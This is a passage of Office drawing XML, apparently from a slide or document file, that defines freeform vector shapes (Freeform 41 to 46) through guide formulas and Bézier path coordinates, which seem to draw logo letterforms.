                    <a:gd name="T52" fmla="*/ 153 w 474"/>
                    <a:gd name="T53" fmla="*/ 161 h 333"/>
                    <a:gd name="T54" fmla="*/ 214 w 474"/>
                    <a:gd name="T55" fmla="*/ 211 h 333"/>
                    <a:gd name="T56" fmla="*/ 184 w 474"/>
                    <a:gd name="T57" fmla="*/ 211 h 333"/>
                    <a:gd name="T58" fmla="*/ 153 w 474"/>
                    <a:gd name="T59" fmla="*/ 186 h 333"/>
                    <a:gd name="T60" fmla="*/ 117 w 474"/>
                    <a:gd name="T61" fmla="*/ 230 h 333"/>
                    <a:gd name="T62" fmla="*/ 153 w 474"/>
                    <a:gd name="T63" fmla="*/ 279 h 333"/>
                    <a:gd name="T64" fmla="*/ 333 w 474"/>
                    <a:gd name="T65" fmla="*/ 260 h 333"/>
                    <a:gd name="T66" fmla="*/ 273 w 474"/>
                    <a:gd name="T67" fmla="*/ 305 h 333"/>
                    <a:gd name="T68" fmla="*/ 219 w 474"/>
                    <a:gd name="T69" fmla="*/ 255 h 333"/>
                    <a:gd name="T70" fmla="*/ 247 w 474"/>
                    <a:gd name="T71" fmla="*/ 255 h 333"/>
                    <a:gd name="T72" fmla="*/ 286 w 474"/>
                    <a:gd name="T73" fmla="*/ 280 h 333"/>
                    <a:gd name="T74" fmla="*/ 302 w 474"/>
                    <a:gd name="T75" fmla="*/ 254 h 333"/>
                    <a:gd name="T76" fmla="*/ 231 w 474"/>
                    <a:gd name="T77" fmla="*/ 225 h 333"/>
                    <a:gd name="T78" fmla="*/ 230 w 474"/>
                    <a:gd name="T79" fmla="*/ 180 h 333"/>
                    <a:gd name="T80" fmla="*/ 288 w 474"/>
                    <a:gd name="T81" fmla="*/ 161 h 333"/>
                    <a:gd name="T82" fmla="*/ 328 w 474"/>
                    <a:gd name="T83" fmla="*/ 205 h 333"/>
                    <a:gd name="T84" fmla="*/ 300 w 474"/>
                    <a:gd name="T85" fmla="*/ 205 h 333"/>
                    <a:gd name="T86" fmla="*/ 276 w 474"/>
                    <a:gd name="T87" fmla="*/ 184 h 333"/>
                    <a:gd name="T88" fmla="*/ 251 w 474"/>
                    <a:gd name="T89" fmla="*/ 199 h 333"/>
                    <a:gd name="T90" fmla="*/ 293 w 474"/>
                    <a:gd name="T91" fmla="*/ 220 h 333"/>
                    <a:gd name="T92" fmla="*/ 333 w 474"/>
                    <a:gd name="T93" fmla="*/ 260 h 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74" h="333">
                      <a:moveTo>
                        <a:pt x="259" y="23"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="47"/>
                        <a:pt x="55" y="164"/>
                        <a:pt x="55" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="164"/>
                        <a:pt x="78" y="164"/>
                        <a:pt x="78" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="302"/>
                        <a:pt x="78" y="302"/>
                        <a:pt x="78" y="302"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="302"/>
                        <a:pt x="49" y="302"/>
                        <a:pt x="49" y="302"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="174"/>
                        <a:pt x="49" y="174"/>
                        <a:pt x="49" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="248"/>
                        <a:pt x="14" y="333"/>
                        <a:pt x="14" y="333"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="410" y="333"/>
                        <a:pt x="410" y="333"/>
                        <a:pt x="410" y="333"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="413" y="332"/>
                        <a:pt x="428" y="303"/>
                        <a:pt x="428" y="303"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="416" y="271"/>
                        <a:pt x="416" y="271"/>
                        <a:pt x="416" y="271"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="379" y="271"/>
                        <a:pt x="379" y="271"/>
                        <a:pt x="379" y="271"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="387" y="248"/>
                        <a:pt x="387" y="248"/>
                        <a:pt x="387" y="248"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="407" y="248"/>
                        <a:pt x="407" y="248"/>
                        <a:pt x="407" y="248"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="392" y="199"/>
                        <a:pt x="392" y="199"/>
                        <a:pt x="392" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="355" y="301"/>
                        <a:pt x="355" y="301"/>
                        <a:pt x="355" y="301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="324" y="301"/>
                        <a:pt x="324" y="301"/>
                        <a:pt x="324" y="301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="377" y="165"/>
                        <a:pt x="377" y="165"/>
                        <a:pt x="377" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="407" y="165"/>
                        <a:pt x="407" y="165"/>
                        <a:pt x="407" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="444" y="262"/>
                        <a:pt x="444" y="262"/>
                        <a:pt x="444" y="262"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="474" y="182"/>
                        <a:pt x="444" y="113"/>
                        <a:pt x="444" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="444" y="113"/>
                        <a:pt x="396" y="0"/>
                        <a:pt x="259" y="23"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="153" y="279"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="181" y="279"/>
                        <a:pt x="184" y="255"/>
                        <a:pt x="184" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="213" y="255"/>
                        <a:pt x="213" y="255"/>
                        <a:pt x="213" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="213" y="255"/>
                        <a:pt x="205" y="305"/>
                        <a:pt x="153" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="305"/>
                        <a:pt x="88" y="257"/>
                        <a:pt x="88" y="238"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="220"/>
                        <a:pt x="94" y="161"/>
                        <a:pt x="153" y="161"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="212" y="161"/>
                        <a:pt x="214" y="211"/>
                        <a:pt x="214" y="211"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="184" y="211"/>
                        <a:pt x="184" y="211"/>
                        <a:pt x="184" y="211"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="184" y="211"/>
                        <a:pt x="179" y="186"/>
                        <a:pt x="153" y="186"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="128" y="186"/>
                        <a:pt x="117" y="208"/>
                        <a:pt x="117" y="230"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="117" y="251"/>
                        <a:pt x="126" y="279"/>
                        <a:pt x="153" y="279"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="333" y="260"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="333" y="260"/>
                        <a:pt x="331" y="309"/>
                        <a:pt x="273" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="216" y="301"/>
                        <a:pt x="219" y="255"/>
                        <a:pt x="219" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="247" y="255"/>
                        <a:pt x="247" y="255"/>
                        <a:pt x="247" y="255"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="251" y="284"/>
                        <a:pt x="274" y="281"/>
                        <a:pt x="286" y="280"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="298" y="280"/>
                        <a:pt x="311" y="266"/>
                        <a:pt x="302" y="254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="292" y="243"/>
                        <a:pt x="250" y="244"/>
                        <a:pt x="231" y="225"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="213" y="206"/>
                        <a:pt x="230" y="180"/>
                        <a:pt x="230" y="180"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="180"/>
                        <a:pt x="247" y="155"/>
                        <a:pt x="288" y="161"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="329" y="168"/>
                        <a:pt x="328" y="205"/>
                        <a:pt x="328" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="300" y="205"/>
                        <a:pt x="300" y="205"/>
                        <a:pt x="300" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="297" y="185"/>
                        <a:pt x="276" y="184"/>
                        <a:pt x="276" y="184"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="276" y="184"/>
                        <a:pt x="251" y="182"/>
                        <a:pt x="251" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="251" y="216"/>
                        <a:pt x="293" y="220"/>
                        <a:pt x="293" y="220"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="341" y="234"/>
                        <a:pt x="333" y="260"/>
                        <a:pt x="333" y="26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76" name="Freeform 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A56662DB-B730-6741-9DBB-C47A3E30CB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24249" y="13006411"/>
                  <a:ext cx="415925" cy="487363"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 61 w 98"/>
                    <a:gd name="T1" fmla="*/ 49 h 115"/>
                    <a:gd name="T2" fmla="*/ 29 w 98"/>
                    <a:gd name="T3" fmla="*/ 33 h 115"/>
                    <a:gd name="T4" fmla="*/ 48 w 98"/>
                    <a:gd name="T5" fmla="*/ 22 h 115"/>
                    <a:gd name="T6" fmla="*/ 66 w 98"/>
                    <a:gd name="T7" fmla="*/ 38 h 115"/>
                    <a:gd name="T8" fmla="*/ 88 w 98"/>
                    <a:gd name="T9" fmla="*/ 38 h 115"/>
                    <a:gd name="T10" fmla="*/ 57 w 98"/>
                    <a:gd name="T11" fmla="*/ 5 h 115"/>
                    <a:gd name="T12" fmla="*/ 13 w 98"/>
                    <a:gd name="T13" fmla="*/ 19 h 115"/>
                    <a:gd name="T14" fmla="*/ 14 w 98"/>
                    <a:gd name="T15" fmla="*/ 52 h 115"/>
                    <a:gd name="T16" fmla="*/ 68 w 98"/>
                    <a:gd name="T17" fmla="*/ 74 h 115"/>
                    <a:gd name="T18" fmla="*/ 56 w 98"/>
                    <a:gd name="T19" fmla="*/ 94 h 115"/>
                    <a:gd name="T20" fmla="*/ 26 w 98"/>
                    <a:gd name="T21" fmla="*/ 75 h 115"/>
                    <a:gd name="T22" fmla="*/ 4 w 98"/>
                    <a:gd name="T23" fmla="*/ 75 h 115"/>
                    <a:gd name="T24" fmla="*/ 46 w 98"/>
                    <a:gd name="T25" fmla="*/ 112 h 115"/>
                    <a:gd name="T26" fmla="*/ 92 w 98"/>
                    <a:gd name="T27" fmla="*/ 78 h 115"/>
                    <a:gd name="T28" fmla="*/ 61 w 98"/>
                    <a:gd name="T29" fmla="*/ 49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8" h="115">
                      <a:moveTo>
                        <a:pt x="61" y="49"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="49"/>
                        <a:pt x="29" y="45"/>
                        <a:pt x="29" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="20"/>
                        <a:pt x="48" y="22"/>
                        <a:pt x="48" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="22"/>
                        <a:pt x="64" y="22"/>
                        <a:pt x="66" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="38"/>
                        <a:pt x="88" y="38"/>
                        <a:pt x="88" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="38"/>
                        <a:pt x="89" y="10"/>
                        <a:pt x="57" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="0"/>
                        <a:pt x="13" y="19"/>
                        <a:pt x="13" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="19"/>
                        <a:pt x="0" y="38"/>
                        <a:pt x="14" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="67"/>
                        <a:pt x="60" y="66"/>
                        <a:pt x="68" y="74"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="83"/>
                        <a:pt x="65" y="94"/>
                        <a:pt x="56" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="94"/>
                        <a:pt x="29" y="96"/>
                        <a:pt x="26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4" y="75"/>
                        <a:pt x="2" y="109"/>
                        <a:pt x="46" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="115"/>
                        <a:pt x="92" y="78"/>
                        <a:pt x="92" y="78"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="78"/>
                        <a:pt x="98" y="59"/>
                        <a:pt x="61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77" name="Freeform 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CDFE09A-4D06-8545-96C2-F549B1A32FC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5882874" y="13031811"/>
                  <a:ext cx="401638" cy="444500"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 92 w 95"/>
                    <a:gd name="T1" fmla="*/ 20 h 105"/>
                    <a:gd name="T2" fmla="*/ 63 w 95"/>
                    <a:gd name="T3" fmla="*/ 1 h 105"/>
                    <a:gd name="T4" fmla="*/ 3 w 95"/>
                    <a:gd name="T5" fmla="*/ 34 h 105"/>
                    <a:gd name="T6" fmla="*/ 30 w 95"/>
                    <a:gd name="T7" fmla="*/ 34 h 105"/>
                    <a:gd name="T8" fmla="*/ 48 w 95"/>
                    <a:gd name="T9" fmla="*/ 18 h 105"/>
                    <a:gd name="T10" fmla="*/ 66 w 95"/>
                    <a:gd name="T11" fmla="*/ 34 h 105"/>
                    <a:gd name="T12" fmla="*/ 39 w 95"/>
                    <a:gd name="T13" fmla="*/ 45 h 105"/>
                    <a:gd name="T14" fmla="*/ 0 w 95"/>
                    <a:gd name="T15" fmla="*/ 77 h 105"/>
                    <a:gd name="T16" fmla="*/ 35 w 95"/>
                    <a:gd name="T17" fmla="*/ 105 h 105"/>
                    <a:gd name="T18" fmla="*/ 67 w 95"/>
                    <a:gd name="T19" fmla="*/ 91 h 105"/>
                    <a:gd name="T20" fmla="*/ 67 w 95"/>
                    <a:gd name="T21" fmla="*/ 102 h 105"/>
                    <a:gd name="T22" fmla="*/ 95 w 95"/>
                    <a:gd name="T23" fmla="*/ 102 h 105"/>
                    <a:gd name="T24" fmla="*/ 92 w 95"/>
                    <a:gd name="T25" fmla="*/ 86 h 105"/>
                    <a:gd name="T26" fmla="*/ 92 w 95"/>
                    <a:gd name="T27" fmla="*/ 20 h 105"/>
                    <a:gd name="T28" fmla="*/ 51 w 95"/>
                    <a:gd name="T29" fmla="*/ 86 h 105"/>
                    <a:gd name="T30" fmla="*/ 28 w 95"/>
                    <a:gd name="T31" fmla="*/ 80 h 105"/>
                    <a:gd name="T32" fmla="*/ 40 w 95"/>
                    <a:gd name="T33" fmla="*/ 60 h 105"/>
                    <a:gd name="T34" fmla="*/ 64 w 95"/>
                    <a:gd name="T35" fmla="*/ 54 h 105"/>
                    <a:gd name="T36" fmla="*/ 51 w 95"/>
                    <a:gd name="T37" fmla="*/ 86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105">
                      <a:moveTo>
                        <a:pt x="92" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="20"/>
                        <a:pt x="90" y="3"/>
                        <a:pt x="63" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="3" y="34"/>
                      </a:cubicBez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30" y="34"/>
                        <a:pt x="28" y="18"/>
                        <a:pt x="48" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="18"/>
                        <a:pt x="66" y="34"/>
                        <a:pt x="66" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="34"/>
                        <a:pt x="68" y="43"/>
                        <a:pt x="39" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="47"/>
                        <a:pt x="0" y="58"/>
                        <a:pt x="0" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="96"/>
                        <a:pt x="18" y="105"/>
                        <a:pt x="35" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="105"/>
                        <a:pt x="67" y="91"/>
                        <a:pt x="67" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="102"/>
                        <a:pt x="67" y="102"/>
                        <a:pt x="67" y="102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="95" y="102"/>
                        <a:pt x="95" y="102"/>
                        <a:pt x="95" y="102"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="95" y="102"/>
                        <a:pt x="92" y="91"/>
                        <a:pt x="92" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="81"/>
                        <a:pt x="92" y="20"/>
                        <a:pt x="92" y="20"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="51" y="86"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="90"/>
                        <a:pt x="30" y="86"/>
                        <a:pt x="28" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="75"/>
                        <a:pt x="23" y="61"/>
                        <a:pt x="40" y="60"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="58"/>
                        <a:pt x="64" y="54"/>
                        <a:pt x="64" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="54"/>
                        <a:pt x="70" y="81"/>
                        <a:pt x="51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78" name="Freeform 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C856B7-4FEE-DD45-A30C-14D8C76ABB6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6314674" y="12887349"/>
                  <a:ext cx="414338" cy="588963"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 63 w 98"/>
                    <a:gd name="T1" fmla="*/ 35 h 139"/>
                    <a:gd name="T2" fmla="*/ 26 w 98"/>
                    <a:gd name="T3" fmla="*/ 49 h 139"/>
                    <a:gd name="T4" fmla="*/ 26 w 98"/>
                    <a:gd name="T5" fmla="*/ 0 h 139"/>
                    <a:gd name="T6" fmla="*/ 0 w 98"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 98"/>
                    <a:gd name="T9" fmla="*/ 136 h 139"/>
                    <a:gd name="T10" fmla="*/ 25 w 98"/>
                    <a:gd name="T11" fmla="*/ 136 h 139"/>
                    <a:gd name="T12" fmla="*/ 25 w 98"/>
                    <a:gd name="T13" fmla="*/ 124 h 139"/>
                    <a:gd name="T14" fmla="*/ 60 w 98"/>
                    <a:gd name="T15" fmla="*/ 139 h 139"/>
                    <a:gd name="T16" fmla="*/ 98 w 98"/>
                    <a:gd name="T17" fmla="*/ 88 h 139"/>
                    <a:gd name="T18" fmla="*/ 63 w 98"/>
                    <a:gd name="T19" fmla="*/ 35 h 139"/>
                    <a:gd name="T20" fmla="*/ 70 w 98"/>
                    <a:gd name="T21" fmla="*/ 105 h 139"/>
                    <a:gd name="T22" fmla="*/ 50 w 98"/>
                    <a:gd name="T23" fmla="*/ 119 h 139"/>
                    <a:gd name="T24" fmla="*/ 27 w 98"/>
                    <a:gd name="T25" fmla="*/ 99 h 139"/>
                    <a:gd name="T26" fmla="*/ 26 w 98"/>
                    <a:gd name="T27" fmla="*/ 76 h 139"/>
                    <a:gd name="T28" fmla="*/ 49 w 98"/>
                    <a:gd name="T29" fmla="*/ 54 h 139"/>
                    <a:gd name="T30" fmla="*/ 71 w 98"/>
                    <a:gd name="T31" fmla="*/ 75 h 139"/>
                    <a:gd name="T32" fmla="*/ 70 w 98"/>
                    <a:gd name="T33" fmla="*/ 10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8" h="139">
                      <a:moveTo>
                        <a:pt x="63" y="35"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="34"/>
                        <a:pt x="26" y="49"/>
                        <a:pt x="26" y="49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25" y="136"/>
                        <a:pt x="25" y="136"/>
                        <a:pt x="25" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="124"/>
                        <a:pt x="25" y="124"/>
                        <a:pt x="25" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="124"/>
                        <a:pt x="38" y="139"/>
                        <a:pt x="60" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="139"/>
                        <a:pt x="98" y="115"/>
                        <a:pt x="98" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="62"/>
                        <a:pt x="87" y="36"/>
                        <a:pt x="63" y="35"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="70" y="105"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="113"/>
                        <a:pt x="58" y="119"/>
                        <a:pt x="50" y="119"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="119"/>
                        <a:pt x="30" y="114"/>
                        <a:pt x="27" y="99"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="85"/>
                        <a:pt x="26" y="76"/>
                        <a:pt x="26" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="76"/>
                        <a:pt x="30" y="54"/>
                        <a:pt x="49" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="54"/>
                        <a:pt x="71" y="75"/>
                        <a:pt x="71" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="75"/>
                        <a:pt x="73" y="98"/>
                        <a:pt x="70" y="10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79" name="Freeform 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E15AE4CB-3EED-424B-810D-E380B5E4F3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84349" y="13790636"/>
                  <a:ext cx="71438" cy="122238"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 17"/>
                    <a:gd name="T1" fmla="*/ 26 h 29"/>
                    <a:gd name="T2" fmla="*/ 16 w 17"/>
                    <a:gd name="T3" fmla="*/ 22 h 29"/>
                    <a:gd name="T4" fmla="*/ 17 w 17"/>
                    <a:gd name="T5" fmla="*/ 15 h 29"/>
                    <a:gd name="T6" fmla="*/ 16 w 17"/>
                    <a:gd name="T7" fmla="*/ 9 h 29"/>
                    <a:gd name="T8" fmla="*/ 14 w 17"/>
                    <a:gd name="T9" fmla="*/ 4 h 29"/>
                    <a:gd name="T10" fmla="*/ 11 w 17"/>
                    <a:gd name="T11" fmla="*/ 1 h 29"/>
                    <a:gd name="T12" fmla="*/ 6 w 17"/>
                    <a:gd name="T13" fmla="*/ 0 h 29"/>
                    <a:gd name="T14" fmla="*/ 0 w 17"/>
                    <a:gd name="T15" fmla="*/ 0 h 29"/>
                    <a:gd name="T16" fmla="*/ 0 w 17"/>
                    <a:gd name="T17" fmla="*/ 29 h 29"/>
                    <a:gd name="T18" fmla="*/ 7 w 17"/>
                    <a:gd name="T19" fmla="*/ 29 h 29"/>
                    <a:gd name="T20" fmla="*/ 11 w 17"/>
                    <a:gd name="T21" fmla="*/ 28 h 29"/>
                    <a:gd name="T22" fmla="*/ 14 w 17"/>
                    <a:gd name="T23" fmla="*/ 26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" h="29">
                      <a:moveTo>
                        <a:pt x="14" y="26"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="25"/>
                        <a:pt x="15" y="23"/>
                        <a:pt x="16" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="20"/>
                        <a:pt x="17" y="18"/>
                        <a:pt x="17" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="13"/>
                        <a:pt x="16" y="11"/>
                        <a:pt x="16" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="7"/>
                        <a:pt x="15" y="5"/>
                        <a:pt x="14" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="2"/>
                        <a:pt x="11" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="0"/>
                        <a:pt x="8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7" y="29"/>
                        <a:pt x="7" y="29"/>
                        <a:pt x="7" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="29"/>
                        <a:pt x="10" y="29"/>
                        <a:pt x="11" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="28"/>
                        <a:pt x="13" y="27"/>
                        <a:pt x="14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80" name="Freeform 45">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED47636-F1BC-BE47-9B3C-B985D44837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344587" y="13785874"/>
                  <a:ext cx="63500" cy="55563"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 15"/>
                    <a:gd name="T1" fmla="*/ 12 h 13"/>
                    <a:gd name="T2" fmla="*/ 15 w 15"/>
                    <a:gd name="T3" fmla="*/ 7 h 13"/>
                    <a:gd name="T4" fmla="*/ 14 w 15"/>
                    <a:gd name="T5" fmla="*/ 2 h 13"/>
                    <a:gd name="T6" fmla="*/ 10 w 15"/>
                    <a:gd name="T7" fmla="*/ 0 h 13"/>
                    <a:gd name="T8" fmla="*/ 0 w 15"/>
                    <a:gd name="T9" fmla="*/ 0 h 13"/>
                    <a:gd name="T10" fmla="*/ 0 w 15"/>
                    <a:gd name="T11" fmla="*/ 13 h 13"/>
                    <a:gd name="T12" fmla="*/ 10 w 15"/>
                    <a:gd name="T13" fmla="*/ 13 h 13"/>
                    <a:gd name="T14" fmla="*/ 14 w 15"/>
                    <a:gd name="T15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13">
                      <a:moveTo>
                        <a:pt x="14" y="12"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="11"/>
                        <a:pt x="15" y="9"/>
                        <a:pt x="15" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="5"/>
                        <a:pt x="15" y="3"/>
                        <a:pt x="14" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="1"/>
                        <a:pt x="11" y="0"/>
                        <a:pt x="1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1" y="13"/>
                        <a:pt x="13" y="13"/>
                        <a:pt x="14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81" name="Freeform 46">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11208900-827A-C243-AD20-5F0C32B005F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3785787" y="13646174"/>
                  <a:ext cx="1643063" cy="533400"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 388"/>
                    <a:gd name="T1" fmla="*/ 0 h 126"/>
                    <a:gd name="T2" fmla="*/ 291 w 388"/>
                    <a:gd name="T3" fmla="*/ 25 h 126"/>
                    <a:gd name="T4" fmla="*/ 307 w 388"/>
                    <a:gd name="T5" fmla="*/ 38 h 126"/>
                    <a:gd name="T6" fmla="*/ 304 w 388"/>
                    <a:gd name="T7" fmla="*/ 65 h 126"/>
                    <a:gd name="T8" fmla="*/ 275 w 388"/>
